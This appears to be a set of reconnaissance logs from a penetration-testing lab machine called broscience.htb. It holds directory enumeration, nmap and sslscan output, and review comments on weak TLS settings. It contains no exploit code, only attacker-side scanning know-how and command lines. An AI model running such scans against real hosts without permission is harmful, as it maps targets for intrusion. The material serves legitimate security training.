403 GET 9l 28w 278c https://10.10.11.195/.hta.jsp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.jsp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.aspx
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.jsp
200 GET 28l 66w 1256c https://10.10.11.195/activate.php
302 GET 1l 3w 13c https://10.10.11.195/comment.php => https://10.10.11.195/login.php
301 GET 9l 28w 315c https://10.10.11.195/images => https://10.10.11.195/images/
301 GET 9l 28w 317c https://10.10.11.195/includes => https://10.10.11.195/includes/
200 GET 147l 510w 0c https://10.10.11.195/index.php
301 GET 9l 28w 319c https://10.10.11.195/javascript => https://10.10.11.195/javascript/
200 GET 45l 104w 2161c https://10.10.11.195/register.php
302 GET 0l 0w 0c https://10.10.11.195/logout.php => https://10.10.11.195/index.php
301 GET 9l 28w 315c https://10.10.11.195/manual => https://10.10.11.195/manual/
403 GET 9l 28w 278c https://10.10.11.195/server-status
301 GET 9l 28w 315c https://10.10.11.195/styles => https://10.10.11.195/styles/
302 GET 1l 3w 13c https://10.10.11.195/update_user.php => https://10.10.11.195/login.php


@@ -0,0 +1,220 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv --reason -Pn -T4 -sV -p 443 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp443/xml/tcp_443_https_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.030s latency).
Scanned at 2023-02-01 17:50:14 CET for 352s
PORT STATE SERVICE REASON VERSION
443/tcp open http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
| ssl-enum-ciphers:
| TLSv1.0:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 3072) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A
| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 4096) - A
| compressors:
| NULL
| cipher preference: client
| warnings:
| Key exchange (dh 3072) of lower strength than certificate key
| Key exchange (secp256r1) of lower strength than certificate key
| TLSv1.1:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 3072) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A
| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 4096) - A
| compressors:
| NULL
| cipher preference: client
| warnings:
| Key exchange (dh 3072) of lower strength than certificate key
| Key exchange (secp256r1) of lower strength than certificate key
| TLSv1.2:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_CCM (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_CCM_8 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CCM (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CCM_8 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 3072) - A
| TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384 (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (dh 3072) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (secp256r1) - A
| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_AES_128_CCM (rsa 4096) - A
| TLS_RSA_WITH_AES_128_CCM_8 (rsa 4096) - A
| TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CCM (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CCM_8 (rsa 4096) - A
| TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 4096) - A
| TLS_RSA_WITH_ARIA_128_GCM_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_ARIA_256_GCM_SHA384 (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 (rsa 4096) - A
| compressors:
| NULL
| cipher preference: client
| warnings:
| Key exchange (dh 3072) of lower strength than certificate key
| Key exchange (secp256r1) of lower strength than certificate key
| TLSv1.3:
| ciphers:
| TLS_AKE_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - A
| TLS_AKE_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - A
| TLS_AKE_WITH_CHACHA20_POLY1305_SHA256 (ecdh_x25519) - A
| cipher preference: client
|_ least strength: A
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-server-header: Apache/2.4.54 (Debian)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-feed: Couldn't find any feeds.
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-vhosts:
|_128 names had status 400
|_http-date: Wed, 01 Feb 2023 16:50:48 GMT; +1s from local time.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-14T19:48:36
| Not valid after: 2023-07-14T19:48:36
| MD5: 5328ddd62f3429d11d26ae8a68d86e0c
| SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b
| -----BEGIN CERTIFICATE-----
| MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL
| BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv
| U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW
| HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN
| MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw
| EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG
| CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ
| KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK
| B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N
| j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d
| mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6
| Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa
| gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1
| m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY
| BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL
| 7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ
| Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG
| BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5
| PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A
| WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD
| AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC
| H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK
| atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb
| TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj
| +Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O
| r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6
| QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO
| P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm
| w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx
| Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK
| bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc
| dfC1SCd82A==
|_-----END CERTIFICATE-----
|_http-mobileversion-checker: No mobile version detected.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
| http-sitemap-generator:
| Directory structure:
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=broscience.htb
| Found the following error pages:
|
| Error Code: 400
|_ http://broscience.htb:443/
|_ssl-date: TLS randomness does not represent time
|_http-chrono: Request times for /; avg: 260.46ms; min: 153.74ms; max: 364.01ms
|_http-comments-displayer: Couldn't find any comments.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
| http-headers:
| Date: Wed, 01 Feb 2023 16:50:51 GMT
| Server: Apache/2.4.54 (Debian)
| Content-Length: 458
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
|
|_ (Request type: GET)
|_http-malware-host: Host appears to be clean
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-security-headers:
| Strict_Transport_Security:
|_ HSTS not configured in HTTPS Server
| http-useragent-tester:
| Status for browser useragent: 400
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-title: 400 Bad Request
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:56:06 2023 -- 1 IP address (1 host up) scanned in 352.25 seconds
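Review bot: The `http-*` script results in this file appear to have been collected against an error page rather than the application, so the negative findings should not be read as a clean result. The service column reports `443/tcp open http` rather than `ssl/http`, `http-errors` lists `http://broscience.htb:443/` with code 400, and `http-title`, `http-vhosts` and `http-useragent-tester` all report status 400. Lines such as `Couldn't find any CSRF vulnerabilities` and `Couldn't find any stored XSS vulnerabilities` therefore presumably describe Apache's Bad Request page. I would add a header comment such as `# NOTE: http-* scripts received 400 responses on this port; re-verify over HTTPS before relying on negatives`.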

Binary file not shown.


@@ -0,0 +1,42 @@
WhatWeb report for https://10.10.11.195:443
Status : 200 OK
Title : BroScience : Home
IP : 10.10.11.195
Country : RESERVED, ZZ
Summary : Cookies[PHPSESSID], HTTPServer[Debian Linux][Apache/2.4.54 (Debian)], Script
Detected Plugins:
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.54 (Debian) (from server string)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 16:50:21 GMT
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=jqrq19g4giei6rge5n6qucmp5u; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1418
Connection: close
Content-Type: text/html; charset=UTF-8


@@ -0,0 +1,215 @@
Version: 2.0.15-static
OpenSSL 1.1.1q-dev xx XXX xxxx
Connected to 10.10.11.195
Testing SSL server 10.10.11.195 on port 443 using SNI name 10.10.11.195
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 enabled
TLS Fallback SCSV:
Connection failed - unable to determine TLS Fallback SCSV support
TLS renegotiation:
Session renegotiation not supported
TLS Compression:
Compression disabled
Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.3 128 bits TLS_AES_128_GCM_SHA256 Curve 25519 DHE 253
Accepted TLSv1.3 256 bits TLS_AES_256_GCM_SHA384 Curve 25519 DHE 253
Accepted TLSv1.3 256 bits TLS_CHACHA20_POLY1305_SHA256 Curve 25519 DHE 253
Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-CHACHA20-POLY1305 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-CHACHA20-POLY1305 DHE 3072 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-CCM8 DHE 3072 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-CCM DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-ARIA256-GCM-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-ARIA256-GCM-SHA384 DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 3072 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-CCM8 DHE 3072 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-CCM DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-ARIA128-GCM-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-ARIA128-GCM-SHA256 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-CAMELLIA256-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA256 DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-CAMELLIA128-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA256 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 3072 bits
Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 3072 bits
Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 3072 bits
Accepted TLSv1.2 256 bits AES256-GCM-SHA384
Accepted TLSv1.2 256 bits AES256-CCM8
Accepted TLSv1.2 256 bits AES256-CCM
Accepted TLSv1.2 256 bits ARIA256-GCM-SHA384
Accepted TLSv1.2 128 bits AES128-GCM-SHA256
Accepted TLSv1.2 128 bits AES128-CCM8
Accepted TLSv1.2 128 bits AES128-CCM
Accepted TLSv1.2 128 bits ARIA128-GCM-SHA256
Accepted TLSv1.2 256 bits AES256-SHA256
Accepted TLSv1.2 256 bits CAMELLIA256-SHA256
Accepted TLSv1.2 128 bits AES128-SHA256
Accepted TLSv1.2 128 bits CAMELLIA128-SHA256
Accepted TLSv1.2 256 bits AES256-SHA
Accepted TLSv1.2 256 bits CAMELLIA256-SHA
Accepted TLSv1.2 128 bits AES128-SHA
Accepted TLSv1.2 128 bits CAMELLIA128-SHA
Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 3072 bits
Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 3072 bits
Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 3072 bits
Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 3072 bits
Accepted TLSv1.1 256 bits AES256-SHA
Accepted TLSv1.1 256 bits CAMELLIA256-SHA
Accepted TLSv1.1 128 bits AES128-SHA
Accepted TLSv1.1 128 bits CAMELLIA128-SHA
Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 3072 bits
Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 3072 bits
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 3072 bits
Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 3072 bits
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 256 bits CAMELLIA256-SHA
Accepted TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 128 bits CAMELLIA128-SHA
Server Key Exchange Group(s):
TLSv1.3 128 bits secp256r1 (NIST P-256)
TLSv1.3 192 bits secp384r1 (NIST P-384)
TLSv1.3 260 bits secp521r1 (NIST P-521)
TLSv1.3 128 bits x25519
TLSv1.3 224 bits x448
TLSv1.2 128 bits secp256r1 (NIST P-256)
TLSv1.2 192 bits secp384r1 (NIST P-384)
TLSv1.2 260 bits secp521r1 (NIST P-521)
TLSv1.2 128 bits x25519
TLSv1.2 224 bits x448
SSL Certificate:
Certificate blob:
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
Version: 2
Serial Number: 0f:ea:a9:2b:4f:28:07:d2:a7:83:59:a9:de:62:31:9c:ed:b5:fa:ce
Signature Algorithm: sha256WithRSAEncryption
Issuer: /C=AT/L=Vienna/O=BroScience/CN=broscience.htb/emailAddress=administrator@broscience.htb
Not valid before: Jul 14 19:48:36 2022 GMT
Not valid after: Jul 14 19:48:36 2023 GMT
Subject: /C=AT/L=Vienna/O=BroScience/CN=broscience.htb/emailAddress=administrator@broscience.htb
Public Key Algorithm: NULL
RSA Public Key: (4096 bit)
RSA Public-Key: (4096 bit)
Modulus:
00:a7:32:5f:61:3f:7b:c0:6a:c9:15:3a:16:82:8e:
5a:85:85:26:8e:a7:2c:78:4a:07:4c:0d:82:63:eb:
71:46:79:c9:c8:b3:3d:cf:ba:7a:b7:a8:16:0c:d9:
9a:3e:6a:23:49:41:5b:86:59:36:7e:66:e6:70:5c:
02:55:71:08:2e:aa:cd:3f:af:51:8d:4d:8f:c5:72:
0b:4b:1e:87:dd:00:25:81:97:1f:29:56:38:9a:04:
97:e6:bc:50:ea:db:8a:b6:e4:ba:f2:4d:87:01:ba:
12:bc:a8:d9:e9:d6:82:64:a4:c8:71:c8:8c:7d:9d:
99:2d:bd:be:6c:9d:c4:02:5a:7d:34:74:e0:84:24:
6e:6c:9f:85:bb:98:30:49:79:69:96:50:09:2f:99:
b8:0f:b9:31:10:96:6e:96:60:f0:4d:36:3b:9c:c0:
59:26:ba:29:cd:d6:d4:39:e3:10:52:4d:10:26:3d:
7f:08:a0:6b:ce:36:b1:1e:d0:c5:06:1a:24:dd:f4:
6c:14:00:1b:40:c9:81:ac:ba:01:ff:bb:70:1f:36:
73:32:2d:f1:a4:5a:81:ca:e4:ac:27:81:b5:67:3a:
b7:45:57:c8:23:80:a9:e5:52:82:1a:b3:62:16:6e:
01:b1:90:69:02:4d:fe:58:1c:54:bd:99:93:2f:09:
b5:ee:f4:10:65:bd:2e:ca:b5:9b:aa:3d:da:0a:0c:
09:f1:05:2b:12:a2:78:3d:27:89:5b:4e:5b:5b:ff:
9a:4b:b0:30:6e:d1:e9:54:58:f4:3e:b2:4a:7f:63:
4c:ad:16:9a:60:58:5f:45:75:e3:9a:18:05:4f:16:
51:b8:40:a9:90:0f:6f:fb:ec:6b:21:a6:56:c2:9a:
5f:aa:ee:35:43:b4:b7:4e:d9:84:c8:ce:f0:63:b5:
98:18:79:d3:bf:b7:61:1b:58:ce:dc:2e:78:23:8b:
ed:ed:cd:e6:37:4e:59:72:1a:b8:65:d0:69:fa:3d:
8e:1b:a1:95:eb:64:b6:67:85:b3:9c:ad:33:98:13:
7f:45:fb:47:e2:27:93:67:28:ba:6e:53:23:f2:95:
2b:65:90:2d:bf:a8:48:e9:20:a9:ba:d5:a4:8c:ab:
dd:8a:e9:a9:6d:4d:9f:27:a4:3f:07:94:6c:2f:e7:
e3:fb:92:66:fd:7e:f5:01:e3:18:9d:da:42:d5:a6:
7f:bd:c9:14:29:06:04:17:a2:ac:db:9f:6f:8f:e2:
99:d5:fc:19:9a:64:26:cd:f9:91:c2:f7:da:04:72:
7e:92:c7:17:d8:32:10:86:d6:f4:d1:27:5f:59:29:
83:c5:5f:0a:b5:09:3a:34:79:3c:57:9d:8d:5b:70:
e0:6f:db
Exponent: 65537 (0x10001)
X509v3 Extensions:
X509v3 Subject Key Identifier:
7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A
X509v3 Authority Key Identifier:
keyid:7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A
X509v3 Basic Constraints: critical
CA:TRUE
Verify Certificate:
self signed certificate
SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 4096
Subject: broscience.htb
Issuer: broscience.htb
Not valid before: Jul 14 19:48:36 2022 GMT
Not valid after: Jul 14 19:48:36 2023 GMT
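Review bot: The protocol table records `TLSv1.0 enabled` and `TLSv1.1 enabled`, both deprecated by RFC 8996, and the suites listed for those two versions are all CBC with SHA-1 MACs; that is the finding from this file worth carrying into the write-up. The nmap `ssl-enum-ciphers` output in the earlier port 443 section lists the same protocols and grades every suite `A`; as far as I know that grade reflects cipher and key-exchange strength rather than protocol age, so it should not be taken as a pass. The scan also ran with `SNI name 10.10.11.195` while the certificate subject is `broscience.htb`, so a name-based virtual host could present a different configuration, which is an assumption to confirm. On the server side the usual remediation is `SSLProtocol -all +TLSv1.2 +TLSv1.3`.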

File diff suppressed because one or more lines are too long


@@ -0,0 +1,16 @@
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/robots.txt
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://broscience.htb/robots.txt">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 10.10.11.195 Port 80</address>
</body></html>


@@ -0,0 +1,16 @@
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://broscience.htb/">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 10.10.11.195 Port 80</address>
</body></html>


@@ -0,0 +1,16 @@
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/.well-known/security.txt
Content-Length: 333
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://broscience.htb/.well-known/security.txt">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 10.10.11.195 Port 80</address>
</body></html>


@@ -0,0 +1,82 @@
